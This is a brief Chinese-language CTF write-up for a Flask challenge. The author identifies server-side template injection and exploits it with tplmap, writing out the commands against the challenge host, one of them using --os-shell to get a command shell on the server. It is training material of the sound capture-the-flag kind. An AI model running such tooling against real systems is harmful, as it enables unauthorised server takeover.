前言
关键字:[flask|ssti]
可见flask,盲猜一手ssti
题解
粗略看了一圈,没发现什么,扫扫目录试试
扫了一圈没发现啥,照着SSTI路子走吧。
得,还真是
也可以拿arjun跑一下
直接跑tplmap吧
python2 tplmap.py -u http://adce423c-3166-4725-b1ae-eb79b910f76a.node4.buuoj.cn/?name=123注意要么用双引号,要么不加引号,单引号会报这个错误,估计类似于PHP那种单引号当纯字符串,双引号才能解析的情况
[!][tplmap] Exiting: No connection adapters were found for
python2 tplmap.py -u http://adce423c-3166-4725-b1ae-eb79b910f76a.node4.buuoj.cn/?name=123 --os-shell
结束
![刷题笔记:[CISCN2019 华东南赛区]Double Secret](/medias/featureimages/34.jpg)
![刷题笔记:[WUSTCTF2020]CV Maker](/medias/featureimages/65.jpg)